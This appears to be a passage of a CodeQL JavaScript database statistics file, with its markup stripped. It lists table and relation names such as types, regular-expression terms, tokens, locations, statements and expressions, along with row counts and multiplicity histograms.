-100 - - -@rest_typeexpr -100 - - -@readonly_typeexpr -100 - - -@bigint_literal_typeexpr -100 - - -@generic_typeexpr -5220 - - -@type_label -3559 - - -@typeof_typeexpr -24 - - -@local_var_type_access -24 - - -@qualified_var_type_access -15 - - -@this_var_type_access -20 - - -@predicate_typeexpr -86 - - 
-@interface_typeexpr -1038 - - -@type_parameter -3463 - - -@plain_function_typeexpr -1674 - - -@local_namespace_access -4671 - - -@qualified_namespace_access -20 - - -@constructor_typeexpr -20 - - -@mapped_typeexpr -20 - - -@conditional_typeexpr -100 - - -@infer_typeexpr -100 - - -@comment -104947 - - -@any_type -1 - - -@string_type -1 - - -@number_type -1 - - -@union_type -1802 - - -@true_type -1 - - -@false_type -1 - - -@type_reference -12383 - - -@object_type -159099 - - -@canonical_type_variable_type -650 - - -@typeof_type -2903 - - -@void_type -1 - - -@undefined_type -1 - - -@null_type -1 - - -@never_type -1 - - -@plain_symbol_type -1 - - -@objectkeyword_type -1 - - -@intersection_type -369 - - -@tuple_type -307 - - -@lexical_type_variable_type -50 - - -@this_type -2731 - - -@number_literal_type -1244 - - -@string_literal_type -30638 - - -@unknown_type -100 - - -@bigint_type -100 - - -@bigint_literal_type -100 - - -@unique_symbol_type -100 - - -@root_symbol -2385 - - -@member_symbol -7223 - - -@other_symbol -584 - - -@function_signature_type -34698 - - -@constructor_signature_type -2646 - - -@slashslash_comment -76841 - - -@slashstar_comment -8834 - - -@doc_comment -19270 - - -@html_comment_start -1 - - -@htmlcommentend -1 - - -@line -1622184 - - -@js_parse_error -8 - - -@regexpterm -33197 - - -@regexp_alt -641 - - -@regexp_seq -3371 - - -@regexp_caret -826 - - -@regexp_dollar -637 - - -@regexp_wordboundary -99 - - -@regexp_nonwordboundary -3 - - -@regexp_positive_lookahead -15 - - -@regexp_negative_lookahead -12 - - -@regexp_star -1057 - - -@regexp_plus -1067 - - -@regexp_opt -478 - - -@regexp_range -146 - - -@regexp_dot -445 - - -@regexp_group -1692 - - -@regexp_normal_constant -15489 - - -@regexp_hex_escape -59 - - -@regexp_unicode_escape -264 - - -@regexp_dec_escape -7 - - -@regexp_oct_escape -1 - - -@regexp_ctrl_escape -599 - - -@regexp_char_class_escape -1573 - - -@regexp_id_escape -2613 - - -@regexp_backref -11 - - -@regexp_char_class -1473 - - 
-@regexp_char_range -619 - - -@regexp_positive_lookbehind -15 - - -@regexp_negative_lookbehind -12 - - -@regexp_unicode_property_escape -12 - - -@regexp_parse_error -122 - - -@token -8770869 - - -@token_eof -5312 - - -@token_null_literal -15526 - - -@token_boolean_literal -31654 - - -@token_numeric_literal -557620 - - -@token_string_literal -269555 - - -@token_regular_expression -2773 - - -@token_identifier -2268328 - - -@token_keyword -551767 - - -@token_punctuator -5068334 - - -@json_value -1643352 - - -@json_null -24 - - -@json_boolean -654 - - -@json_number -273113 - - -@json_string -752355 - - -@json_array -175925 - - -@json_object -441281 - - -@json_parse_error -1 - - -@entry_node -121542 - - -@exit_node -121542 - - -@guard_node -177785 - - -@jsdoc -19270 - - -@falsy_guard -86336 - - -@truthy_guard -91449 - - -@jsdoc_tag -29323 - - -@jsdoc_type_expr -22481 - - -@jsdoc_any_type_expr -292 - - -@jsdoc_null_type_expr -35 - - -@jsdoc_undefined_type_expr -287 - - -@jsdoc_unknown_type_expr -27 - - -@jsdoc_void_type_expr -8 - - -@jsdoc_named_type_expr -18639 - - -@jsdoc_applied_type_expr -303 - - -@jsdoc_nullable_type_expr -310 - - -@jsdoc_non_nullable_type_expr -536 - - -@jsdoc_record_type_expr -91 - - -@jsdoc_array_type_expr -19 - - -@jsdoc_union_type_expr -668 - - -@jsdoc_function_type_expr -316 - - -@jsdoc_optional_type_expr -895 - - -@jsdoc_rest_type_expr -55 - - -@jsdoc_error -1658 - - -@yaml_node -885 - - -@yaml_scalar_node -700 - - -@yaml_mapping_node -149 - - -@yaml_sequence_node -35 - - -@yaml_alias_node -1 - - -@yaml_error -1 - - -@jsx_element -1090 - - -@jsx_qualified_name -100 - - -@jsx_empty_expr -100 - - -@await_expr -100 - - -@function_sent_expr -100 - - -@decorator -100 - - -@bind_expr -100 - - -@bigint_literal -100 - - -@nullishcoalescing_expr -100 - - -@e4x_xml_anyname -100 - - -@e4x_xml_static_attribute_selector -100 - - -@e4x_xml_dynamic_attribute_selector -100 - - -@e4x_xml_filter_expression -100 - - -@e4x_xml_static_qualident -100 - - 
-@e4x_xml_dynamic_qualident -100 - - -@e4x_xml_dotdotexpr -100 - - -@xmldtd -1 - - -@xmlelement -1270313 - - -@xmlattribute -1202020 - - -@xmlnamespace -4185 - - -@xmlcomment -26812 - - -@xmlcharacters -439958 - - -@optionalchainable -100 - - -@nullishcoalescing_expr -100 - - -@config -69795 - - -@configName -69794 - - -@configValue -69691 - - - - - -locations_default -id -15664049 - - -id -15664049 - - -file -6457 - - -beginLine -277405 - - -beginColumn -117878 - - -endLine -277405 - - -endColumn -117868 - - - - -id -file - - -12 - - -1 -2 -15664049 - - - - - - -id -beginLine - - -12 - - -1 -2 -15664049 - - - - - - -id -beginColumn - - -12 - - -1 -2 -15664049 - - - - - - -id -endLine - - -12 - - -1 -2 -15664049 - - - - - - -id -endColumn - - -12 - - -1 -2 -15664049 - - - - - - -file -id - - -12 - - -1 -2 -674 - - -2 -28 -501 - - -28 -105 -488 - - -105 -211 -488 - - -211 -335 -490 - - -335 -477 -485 - - -477 -637 -488 - - -637 -856 -486 - - -856 -1141 -485 - - -1141 -1602 -485 - - -1604 -2336 -486 - - -2336 -4472 -485 - - -4472 -2368854 -416 - - - - - - -file -beginLine - - -12 - - -1 -2 -674 - - -2 -13 -509 - - -13 -23 -513 - - -23 -35 -516 - - -35 -50 -504 - - -50 -69 -506 - - -69 -92 -489 - - -92 -124 -504 - - -124 -165 -487 - - -165 -230 -490 - - -230 -357 -491 - - -357 -737 -485 - - -737 -277406 -289 - - - - - - -file -beginColumn - - -12 - - -1 -2 -674 - - -2 -12 -491 - - -12 -32 -495 - - -32 -46 -510 - - -46 -56 -498 - - -56 -62 -488 - - -62 -67 -500 - - -67 -71 -477 - - -71 -75 -583 - - -75 -78 -497 - - -78 -80 -403 - - -80 -82 -543 - - -82 -117856 -298 - - - - - - -file -endLine - - -12 - - -1 -2 -674 - - -2 -13 -509 - - -13 -23 -509 - - -23 -35 -520 - - -35 -50 -504 - - -50 -69 -506 - - -69 -92 -489 - - -92 -124 -504 - - -124 -165 -487 - - -165 -230 -490 - - -230 -357 -491 - - -357 -737 -485 - - -737 -277406 -289 - - - - - - -file -endColumn - - -12 - - -1 -2 -682 - - -2 -18 -501 - - -18 -36 -487 - - -36 -51 -513 - - -51 -61 -532 - - -61 -67 -508 - - -67 
-72 -568 - - -72 -75 -444 - - -75 -78 -514 - - -78 -80 -484 - - -80 -81 -283 - - -81 -82 -579 - - -82 -117837 -362 - - - - - - -beginLine -id - - -12 - - -1 -6 -666 - - -7 -8 -116499 - - -8 -14 -19181 - - -14 -15 -29298 - - -15 -19 -25329 - - -19 -24 -17273 - - -24 -29 -22410 - - -29 -56 -21150 - - -56 -242 -20830 - - -242 -134468 -4769 - - - - - - -beginLine -file - - -12 - - -1 -2 -117975 - - -2 -3 -120803 - - -3 -8 -21079 - - -8 -6458 -17548 - - - - - - -beginLine -beginColumn - - -12 - - -1 -5 -667 - - -5 -6 -116499 - - -6 -11 -19126 - - -11 -12 -32612 - - -12 -15 -18313 - - -15 -17 -18964 - - -17 -21 -21845 - - -21 -31 -21197 - - -31 -64 -20988 - - -64 -94454 -7194 - - - - - - -beginLine -endLine - - -12 - - -1 -2 -238980 - - -2 -3 -22312 - - -3 -890 -16113 - - - - - - -beginLine -endColumn - - -12 - - -1 -5 -667 - - -5 -6 -116499 - - -6 -12 -20939 - - -12 -13 -28687 - - -13 -16 -19707 - - -16 -18 -20057 - - -18 -22 -21035 - - -22 -33 -21605 - - -33 -69 -21089 - - -69 -94455 -7120 - - - - - - -beginColumn -id - - -12 - - -1 -2 -5117 - - -2 -3 -9246 - - -3 -4 -13440 - - -4 -5 -15857 - - -5 -6 -13813 - - -6 -7 -11696 - - -7 -8 -8777 - - -8 -9 -6887 - - -9 -11 -9723 - - -11 -14 -10392 - - -14 -20 -9364 - - -20 -2248970 -3566 - - - - - - -beginColumn -file - - -12 - - -1 -2 -68610 - - -2 -3 -15842 - - -3 -4 -7965 - - -4 -5 -9221 - - -5 -6 -8014 - - -6 -6458 -8226 - - - - - - -beginColumn -beginLine - - -12 - - -1 -2 -6868 - - -2 -3 -15317 - - -3 -4 -24725 - - -4 -5 -25386 - - -5 -6 -10178 - - -6 -7 -6239 - - -7 -9 -10825 - - -9 -11 -9294 - - -11 -1255 -8841 - - -1258 -277405 -205 - - - - - - -beginColumn -endLine - - -12 - - -1 -2 -6868 - - -2 -3 -15317 - - -3 -4 -24725 - - -4 -5 -25386 - - -5 -6 -10175 - - -6 -7 -6232 - - -7 -9 -10827 - - -9 -11 -9299 - - -11 -1227 -8842 - - -1256 -277405 -207 - - - - - - -beginColumn -endColumn - - -12 - - -1 -2 -24039 - - -2 -3 -21662 - - -3 -4 -22809 - - -4 -5 -17118 - - -5 -6 -12038 - - -6 -7 -7768 - - -7 -10 -9297 - - -10 
-1064 -3147 - - - - - - -endLine -id - - -12 - - -1 -6 -666 - - -7 -8 -116499 - - -8 -14 -18715 - - -14 -15 -30262 - - -15 -19 -24946 - - -19 -24 -17066 - - -24 -29 -22451 - - -29 -56 -21060 - - -56 -237 -20821 - - -237 -134470 -4919 - - - - - - -endLine -file - - -12 - - -1 -2 -117975 - - -2 -3 -120803 - - -3 -8 -21076 - - -8 -6458 -17551 - - - - - - -endLine -beginLine - - -12 - - -1 -2 -243883 - - -2 -4 -23431 - - -4 -71 -10091 - - - - - - -endLine -beginColumn - - -12 - - -1 -5 -667 - - -5 -6 -116499 - - -6 -11 -19057 - - -11 -12 -32046 - - -12 -15 -18779 - - -15 -17 -18710 - - -17 -21 -21785 - - -21 -31 -21103 - - -31 -63 -20930 - - -63 -94454 -7829 - - - - - - -endLine -endColumn - - -12 - - -1 -5 -667 - - -5 -6 -116499 - - -6 -12 -21177 - - -12 -13 -28718 - - -13 -16 -19585 - - -16 -18 -21210 - - -18 -23 -23344 - - -23 -35 -21013 - - -35 -80 -20938 - - -80 -94454 -4254 - - - - - - -endColumn -id - - -12 - - -1 -2 -4439 - - -2 -3 -8489 - - -3 -4 -12884 - - -4 -5 -16048 - - -5 -6 -15554 - - -6 -7 -12546 - - -7 -8 -9231 - - -8 -9 -6405 - - -9 -11 -9266 - - -11 -14 -10367 - - -14 -20 -9186 - - -20 -489713 -3453 - - - - - - -endColumn -file - - -12 - - -1 -2 -68569 - - -2 -3 -15919 - - -3 -4 -7876 - - -4 -5 -9221 - - -5 -6 -8062 - - -6 -6458 -8221 - - - - - - -endColumn -beginLine - - -12 - - -1 -2 -6848 - - -2 -3 -15273 - - -3 -4 -24807 - - -4 -5 -25343 - - -5 -6 -10180 - - -6 -7 -6269 - - -7 -9 -10857 - - -9 -11 -9251 - - -11 -1768 -8841 - - -1780 -212575 -199 - - - - - - -endColumn -beginColumn - - -12 - - -1 -2 -15842 - - -2 -3 -27460 - - -3 -4 -26707 - - -4 -5 -18639 - - -5 -6 -11518 - - -6 -8 -10766 - - -8 -265 -6936 - - - - - - -endColumn -endLine - - -12 - - -1 -2 -6850 - - -2 -3 -15271 - - -3 -4 -24807 - - -4 -5 -25343 - - -5 -6 -10180 - - -6 -7 -6269 - - -7 -9 -10858 - - -9 -11 -9252 - - -11 -1789 -8841 - - -1795 -212360 -197 - - - - - - - - -numlines -122044 - - -element_id -122044 - - -num_lines -1136 - - -num_code -939 - - -num_comment -418 - - - - 
-element_id -num_lines - - -12 - - -1 -2 -122044 - - - - - - -element_id -num_code - - -12 - - -1 -2 -122044 - - - - - - -element_id -num_comment - - -12 - - -1 -2 -122044 - - - - - - -num_lines -element_id - - -12 - - -1 -2 -399 - - -2 -3 -144 - - -3 -4 -97 - - -4 -6 -91 - - -6 -9 -86 - - -9 -15 -90 - - -15 -36 -86 - - -36 -174 -86 - - -175 -21589 -57 - - - - - - -num_lines -num_code - - -12 - - -1 -2 -444 - - -2 -3 -140 - - -3 -4 -95 - - -4 -6 -87 - - -6 -9 -85 - - -9 -14 -88 - - -14 -24 -90 - - -24 -33 -89 - - -33 -38 -18 - - - - - - -num_lines -num_comment - - -12 - - -1 -2 -444 - - -2 -3 -140 - - -3 -4 -94 - - -4 -6 -92 - - -6 -9 -90 - - -9 -14 -90 - - -14 -20 -89 - - -20 -27 -89 - - -27 -30 -8 - - - - - - -num_code -element_id - - -12 - - -1 -2 -317 - - -2 -3 -125 - - -3 -4 -67 - - -4 -5 -61 - - -5 -8 -67 - - -8 -12 -73 - - -12 -26 -72 - - -26 -69 -71 - - -69 -1540 -71 - - -1747 -22000 -15 - - - - - - -num_code -num_lines - - -12 - - -1 -2 -349 - - -2 -3 -118 - - -3 -4 -77 - - -4 -6 -76 - - -6 -10 -84 - - -10 -19 -78 - - -19 -31 -79 - - -31 -44 -73 - - -44 -52 -5 - - - - - - -num_code -num_comment - - -12 - - -1 -2 -347 - - -2 -3 -121 - - -3 -4 -79 - - -4 -6 -74 - - -6 -9 -74 - - -9 -16 -80 - - -16 -23 -72 - - -23 -31 -76 - - -31 -40 -16 - - - - - - -num_comment -element_id - - -12 - - -1 -2 -147 - - -2 -3 -67 - - -3 -4 -26 - - -4 -5 -26 - - -5 -7 -32 - - -7 -12 -34 - - -12 -32 -34 - - -33 -135 -32 - - -150 -93795 -20 - - - - - - -num_comment -num_lines - - -12 - - -1 -2 -171 - - -2 -3 -57 - - -3 -4 -32 - - -4 -5 -24 - - -5 -8 -33 - - -8 -18 -35 - - -19 -47 -32 - - -52 -253 -33 - - -362 -363 -1 - - - - - - -num_comment -num_code - - -12 - - -1 -2 -174 - - -2 -3 -54 - - -3 -4 -33 - - -4 -5 -22 - - -5 -8 -33 - - -8 -18 -36 - - -19 -47 -32 - - -51 -230 -32 - - -232 -346 -2 - - - - - - - - -files -id -6457 - - -id -6457 - - -name -6457 - - - - -id -name - - -12 - - -1 -2 -6457 - - - - - - -name -id - - -12 - - -1 -2 -6457 - - - - - - - - -folders -id -1590 - - 
-id -1590 - - -name -1590 - - - - -id -name - - -12 - - -1 -2 -1590 - - - - - - -name -id - - -12 - - -1 -2 -1590 - - - - - - - - -containerparent -child -8046 - - -parent -1590 - - -child -8046 - - - - -parent -child - - -12 - - -1 -2 -525 - - -2 -3 -326 - - -3 -4 -207 - - -4 -5 -128 - - -5 -7 -138 - - -7 -11 -132 - - -11 -53 -120 - - -60 -335 -14 - - - - - - -child -parent - - -12 - - -1 -2 -8046 - - - - - - - - -externalData -5684 - - -id -950 - - -path -3 - - -column -6 - - -value -790 - - - - -id -path - - -12 - - -1 -2 -950 - - - - - - -id -column - - -12 - - -2 -3 -4 - - -6 -7 -946 - - - - - - -id -value - - -12 - - -2 -6 -8 - - -6 -7 -942 - - - - - - -path -id - - -12 - - -4 -5 -1 - - -72 -73 -1 - - -874 -875 -1 - - - - - - -path -column - - -12 - - -2 -3 -1 - - -6 -7 -2 - - - - - - -path -value - - -12 - - -8 -9 -1 - - -86 -87 -1 - - -722 -723 -1 - - - - - - -column -id - - -12 - - -946 -947 -4 - - -950 -951 -2 - - - - - - -column -path - - -12 - - -2 -3 -4 - - -3 -4 -2 - - - - - - -column -value - - -12 - - -2 -3 -1 - - -6 -7 -1 - - -31 -32 -1 - - -93 -94 -1 - - -117 -118 -1 - - -620 -621 -1 - - - - - - -value -id - - -12 - - -1 -2 -478 - - -2 -3 -132 - - -3 -5 -69 - - -5 -16 -61 - - -16 -928 -50 - - - - - - -value -path - - -12 - - -1 -2 -764 - - -2 -3 -26 - - - - - - -value -column - - -12 - - -1 -2 -711 - - -2 -3 -79 - - - - - - - - -sourceLocationPrefix -1 - - -prefix -1 - - - - - -toplevels -id -5320 - - -id -5320 - - -kind -4 - - - - -id -kind - - -12 - - -1 -2 -5320 - - - - - - -kind -id - - -12 - - -3 -4 -1 - - -31 -32 -1 - - -86 -87 -1 - - -5200 -5201 -1 - - - - - - - - -is_externs -44 - - -toplevel -44 - - - - - -is_instantiated -5 - - -decl -5 - - - - - -has_declare_keyword -66 - - -stmt -66 - - - - - -has_asserts_keyword -66 - - -node -66 - - - - - -is_abstract_member -66 - - -id -66 - - - - - -has_public_keyword -9297 - - -id -9297 - - - - - -has_private_keyword -11391 - - -id -11391 - - - - - -has_protected_keyword -1048 - - -id -1048 - - - 
- - -has_readonly_keyword -2338 - - -id -2338 - - - - - -has_type_keyword -1000 - - -id -1000 - - - - - -is_optional_member -3668 - - -id -3668 - - - - - -has_definite_assignment_assertion -100 - - -id -100 - - - - - -is_optional_parameter_declaration -3966 - - -parameter -3966 - - - - - -parameter_fields -2693 - - -field -2693 - - -constructor -1020 - - -param_index -20 - - - - -field -constructor - - -12 - - -1 -2 -2693 - - - - - - -field -param_index - - -12 - - -1 -2 -2693 - - - - - - -constructor -field - - -12 - - -1 -2 -439 - - -2 -3 -233 - - -3 -4 -118 - - -4 -5 -78 - - -5 -7 -83 - - -7 -21 -69 - - - - - - -constructor -param_index - - -12 - - -1 -2 -439 - - -2 -3 -233 - - -3 -4 -118 - - -4 -5 -78 - - -5 -7 -83 - - -7 -21 -69 - - - - - - -param_index -field - - -12 - - -1 -2 -1 - - -2 -3 -1 - - -3 -4 -1 - - -4 -5 -1 - - -5 -6 -1 - - -6 -7 -1 - - -8 -9 -1 - - -10 -11 -1 - - -15 -16 -1 - - -22 -23 -1 - - -29 -30 -1 - - -36 -37 -1 - - -48 -49 -1 - - -69 -70 -1 - - -104 -105 -1 - - -152 -153 -1 - - -230 -231 -1 - - -348 -349 -1 - - -581 -582 -1 - - -1020 -1021 -1 - - - - - - -param_index -constructor - - -12 - - -1 -2 -1 - - -2 -3 -1 - - -3 -4 -1 - - -4 -5 -1 - - -5 -6 -1 - - -6 -7 -1 - - -8 -9 -1 - - -10 -11 -1 - - -15 -16 -1 - - -22 -23 -1 - - -29 -30 -1 - - -36 -37 -1 - - -48 -49 -1 - - -69 -70 -1 - - -104 -105 -1 - - -152 -153 -1 - - -230 -231 -1 - - -348 -349 -1 - - -581 -582 -1 - - -1020 -1021 -1 - - - - - - - - -is_const_enum -62 - - -id -62 - - - - - -is_abstract_class -116 - - -id -116 - - - - - -typeexprs -54050 - - -id -54050 - - -kind -6 - - -parent -29264 - - -idx -26 - - -tostring -3278 - - - - -id -kind - - -12 - - -1 -2 -54050 - - - - - - -id -parent - - -12 - - -1 -2 -54050 - - - - - - -id -idx - - -12 - - -1 -2 -54050 - - - - - - -id -tostring - - -12 - - -1 -2 -54050 - - - - - - -kind -id - - -12 - - -3 -4 -1 - - -4 -5 -1 - - -733 -734 -1 - - -2513 -2514 -1 - - -25306 -25307 -1 - - -25491 -25492 -1 - - - - - - -kind -parent - - -12 - - -3 -4 
-1 - - -4 -5 -1 - - -733 -734 -1 - - -2513 -2514 -1 - - -16661 -16662 -1 - - -17601 -17602 -1 - - - - - - -kind -idx - - -12 - - -1 -2 -2 - - -3 -4 -1 - - -4 -5 -1 - - -19 -20 -1 - - -25 -26 -1 - - - - - - -kind -tostring - - -12 - - -2 -3 -1 - - -3 -4 -1 - - -9 -10 -1 - - -242 -243 -1 - - -2075 -2076 -1 - - -2322 -2323 -1 - - - - - - -parent -id - - -12 - - -1 -2 -15321 - - -2 -3 -7887 - - -3 -4 -3725 - - -4 -9 -2229 - - -9 -24 -102 - - - - - - -parent -kind - - -12 - - -1 -2 -21285 - - -2 -3 -7707 - - -3 -4 -272 - - - - - - -parent -idx - - -12 - - -1 -2 -15321 - - -2 -3 -7887 - - -3 -4 -3725 - - -4 -9 -2229 - - -9 -24 -102 - - - - - - -parent -tostring - - -12 - - -1 -2 -16315 - - -2 -3 -8432 - - -3 -4 -3126 - - -4 -22 -1391 - - - - - - -idx -id - - -12 - - -1 -2 -2 - - -3 -4 -2 - - -4 -7 -2 - - -10 -12 -2 - - -13 -22 -2 - - -27 -38 -2 - - -54 -61 -2 - - -101 -212 -2 - - -356 -530 -2 - - -859 -1645 -2 - - -2513 -2519 -2 - - -3330 -7198 -2 - - -15305 -19237 -2 - - - - - - -idx -kind - - -12 - - -1 -2 -7 - - -2 -3 -14 - - -3 -4 -2 - - -4 -5 -3 - - - - - - -idx -parent - - -12 - - -1 -2 -2 - - -3 -4 -2 - - -4 -7 -2 - - -10 -12 -2 - - -13 -22 -2 - - -27 -38 -2 - - -54 -61 -2 - - -101 -212 -2 - - -356 -530 -2 - - -859 -1645 -2 - - -2513 -2519 -2 - - -3330 -7198 -2 - - -15305 -19237 -2 - - - - - - -idx -tostring - - -12 - - -1 -2 -2 - - -3 -4 -2 - - -4 -6 -2 - - -9 -10 -2 - - -12 -17 -2 - - -18 -26 -2 - - -28 -31 -2 - - -37 -44 -2 - - -60 -71 -2 - - -108 -196 -2 - - -395 -667 -2 - - -746 -978 -2 - - -1522 -2076 -2 - - - - - - -tostring -id - - -12 - - -1 -2 -1085 - - -2 -3 -627 - - -3 -4 -344 - - -4 -5 -322 - - -5 -7 -292 - - -7 -12 -260 - - -12 -45 -247 - - -45 -7788 -101 - - - - - - -tostring -kind - - -12 - - -1 -2 -1903 - - -2 -3 -1375 - - - - - - -tostring -parent - - -12 - - -1 -2 -1097 - - -2 -3 -631 - - -3 -4 -341 - - -4 -5 -327 - - -5 -7 -292 - - -7 -12 -253 - - -12 -48 -246 - - -48 -6190 -91 - - - - - - -tostring -idx - - -12 - - -1 -2 -1450 - - -2 -3 -939 - 
- -3 -4 -481 - - -4 -6 -289 - - -6 -19 -119 - - - - - - - - -is_for_await_of -1 - - -forof -1 - - - - - -is_module -21 - - -tl -21 - - - - - -is_es2015_module -21 - - -tl -21 - - - - - -is_closure_module -21 - - -tl -21 - - - - - -toplevel_parent_xml_node -43 - - -toplevel -43 - - -xmlnode -43 - - - - -toplevel -xmlnode - - -12 - - -1 -2 -43 - - - - - - -xmlnode -toplevel - - -12 - - -1 -2 -43 - - - - - - - - -xml_element_parent_expression -1 - - -xmlnode -1 - - -expression -1 - - -index -1 - - - - -xmlnode -expression - - -12 - - -1 -2 -1 - - - - - - -xmlnode -index - - -12 - - -1 -2 -1 - - - - - - -expression -xmlnode - - -12 - - -1 -2 -1 - - - - - - -expression -index - - -12 - - -1 -2 -1 - - - - - - -index -xmlnode - - -12 - - -1 -2 -1 - - - - - - -index -expression - - -12 - - -1 -2 -1 - - - - - - - - -is_nodejs -12 - - -tl -12 - - - - - -stmts -id -1096691 - - -id -1096691 - - -kind -31 - - -parent -412140 - - -idx -152947 - - -tostring -284956 - - - - -id -kind - - -12 - - -1 -2 -1096691 - - - - - - -id -parent - - -12 - - -1 -2 -1096691 - - - - - - -id -idx - - -12 - - -1 -2 -1096691 - - - - - - -id -tostring - - -12 - - -1 -2 -1096691 - - - - - - -kind -id - - -12 - - -1 -2 -3 - - -3 -5 -2 - - -5 -9 -2 - - -31 -42 -2 - - -61 -552 -2 - - -1118 -1137 -2 - - -1272 -1316 -2 - - -1316 -1379 -2 - - -1471 -1570 -2 - - -1642 -2306 -2 - - -3120 -5386 -2 - - -8674 -10150 -2 - - -16771 -48210 -2 - - -68214 -105607 -2 - - -204994 -610341 -2 - - - - - - -kind -parent - - -12 - - -1 -2 -4 - - -3 -5 -2 - - -5 -6 -2 - - -35 -59 -2 - - -298 -424 -2 - - -738 -1157 -2 - - -1253 -1263 -2 - - -1271 -1321 -2 - - -1495 -1568 -2 - - -1642 -2306 -2 - - -2999 -4416 -2 - - -4734 -10123 -2 - - -48139 -48347 -2 - - -50857 -162082 -2 - - -191077 -191078 -1 - - - - - - -kind -idx - - -12 - - -1 -2 -3 - - -2 -3 -2 - - -3 -4 -2 - - -8 -9 -2 - - -10 -12 -2 - - -16 -22 -2 - - -28 -32 -2 - - -36 -37 -2 - - -39 -51 -2 - - -54 -63 -2 - - -65 -67 -2 - - -116 -118 -2 - - -122 -138 -2 - - -251 
-1564 -2 - - -1967 -152946 -2 - - - - - - -kind -tostring - - -12 - - -1 -2 -5 - - -2 -3 -2 - - -4 -11 -2 - - -12 -17 -2 - - -88 -104 -2 - - -147 -168 -2 - - -239 -296 -2 - - -356 -428 -2 - - -591 -705 -2 - - -811 -829 -2 - - -1092 -2254 -2 - - -2665 -10292 -2 - - -18023 -21916 -2 - - -43911 -180066 -2 - - - - - - -parent -id - - -12 - - -1 -2 -265890 - - -2 -3 -69435 - - -3 -4 -25109 - - -4 -8 -34966 - - -8 -152946 -16740 - - - - - - -parent -kind - - -12 - - -1 -2 -319546 - - -2 -3 -67918 - - -3 -23 -24676 - - - - - - -parent -idx - - -12 - - -1 -2 -265890 - - -2 -3 -69435 - - -3 -4 -25109 - - -4 -8 -34966 - - -8 -152946 -16740 - - - - - - -parent -tostring - - -12 - - -1 -2 -275359 - - -2 -3 -62818 - - -3 -4 -25781 - - -4 -8 -34293 - - -8 -19511 -13889 - - - - - - -idx -id - - -12 - - -1 -2 -149939 - - -2 -220361 -3008 - - - - - - -idx -kind - - -12 - - -1 -2 -149940 - - -2 -28 -3007 - - - - - - -idx -parent - - -12 - - -1 -2 -149939 - - -2 -220361 -3008 - - - - - - -idx -tostring - - -12 - - -1 -2 -149939 - - -2 -88922 -3008 - - - - - - -tostring -id - - -12 - - -1 -2 -186537 - - -2 -3 -48494 - - -3 -5 -24651 - - -5 -37 -21526 - - -37 -72175 -3748 - - - - - - -tostring -kind - - -12 - - -1 -2 -284895 - - -2 -4 -61 - - - - - - -tostring -parent - - -12 - - -1 -2 -195596 - - -2 -3 -45562 - - -3 -5 -23127 - - -5 -66340 -20671 - - - - - - -tostring -idx - - -12 - - -1 -2 -225945 - - -2 -3 -33948 - - -3 -13 -21496 - - -13 -903 -3567 - - - - - - - - -stmt_containers -1096691 - - -stmt -1096691 - - -container -120740 - - - - -stmt -container - - -12 - - -1 -2 -1096691 - - - - - - -container -stmt - - -12 - - -1 -2 -6778 - - -2 -3 -35010 - - -3 -4 -16178 - - -4 -5 -12184 - - -5 -6 -9476 - - -6 -7 -7569 - - -7 -9 -10084 - - -9 -13 -10057 - - -13 -27 -9196 - - -27 -152947 -4208 - - - - - - - - -jump_targets -11791 - - -jump -11791 - - -target -4873 - - - - -jump -target - - -12 - - -1 -2 -11791 - - - - - - -target -jump - - -12 - - -1 -2 -2542 - - -2 -3 -1106 - - -3 -4 
-505 - - -4 -6 -410 - - -6 -260 -310 - - - - - - - - -exprs -id -5495305 - - -id -5495305 - - -kind -85 - - -parent -3130204 - - -idx -17698 - - -tostring -834491 - - - - -id -kind - - -12 - - -1 -2 -5495305 - - - - - - -id -parent - - -12 - - -1 -2 -5495305 - - - - - - -id -idx - - -12 - - -1 -2 -5495305 - - - - - - -id -tostring - - -12 - - -1 -2 -5495305 - - - - - - -kind -id - - -12 - - -1 -4 -7 - - -4 -45 -7 - - -50 -97 -7 - - -108 -458 -7 - - -503 -824 -7 - - -1135 -2497 -7 - - -2527 -5439 -7 - - -5655 -10255 -7 - - -10789 -15893 -7 - - -17758 -42854 -7 - - -50958 -130844 -7 - - -245084 -722374 -7 - - -1295408 -1295409 -1 - - - - - - -kind -parent - - -12 - - -1 -3 -7 - - -3 -45 -7 - - -47 -93 -7 - - -106 -407 -7 - - -457 -809 -7 - - -1108 -2420 -7 - - -2502 -5349 -7 - - -5453 -10133 -7 - - -10658 -15697 -7 - - -16273 -36888 -7 - - -41849 -128642 -7 - - -199566 -722374 -7 - - -1171898 -1171899 -1 - - - - - - -kind -idx - - -12 - - -1 -2 -7 - - -2 -3 -12 - - -3 -4 -11 - - -4 -5 -7 - - -5 -6 -7 - - -6 -7 -3 - - -7 -8 -7 - - -8 -11 -6 - - -12 -18 -7 - - -20 -64 -7 - - -82 -395 -7 - - -431 -13375 -4 - - - - - - -kind -tostring - - -12 - - -1 -2 -7 - - -2 -6 -7 - - -8 -37 -7 - - -38 -126 -7 - - -142 -304 -7 - - -358 -721 -7 - - -811 -1485 -7 - - -1523 -2918 -7 - - -3305 -5078 -7 - - -5422 -9940 -7 - - -10536 -40606 -7 - - -46227 -123090 -7 - - -128754 -128755 -1 - - - - - - -parent -id - - -12 - - -1 -2 -1100280 - - -2 -3 -1876078 - - -3 -17692 -153846 - - - - - - -parent -kind - - -12 - - -1 -2 -1300246 - - -2 -3 -1747609 - - -3 -8 -82349 - - - - - - -parent -idx - - -12 - - -1 -2 -1100280 - - -2 -3 -1876078 - - -3 -17692 -153846 - - - - - - -parent -tostring - - -12 - - -1 -2 -1108803 - - -2 -3 -1870864 - - -3 -17526 -150537 - - - - - - -idx -id - - -12 - - -1 -2 -4092 - - -2 -3 -1365 - - -3 -4 -1995 - - -4 -5 -283 - - -5 -6 -1681 - - -6 -7 -5909 - - -7 -10 -1344 - - -10 -3049605 -1029 - - - - - - -idx -kind - - -12 - - -1 -2 -10648 - - -2 -3 -6398 - - -3 -83 
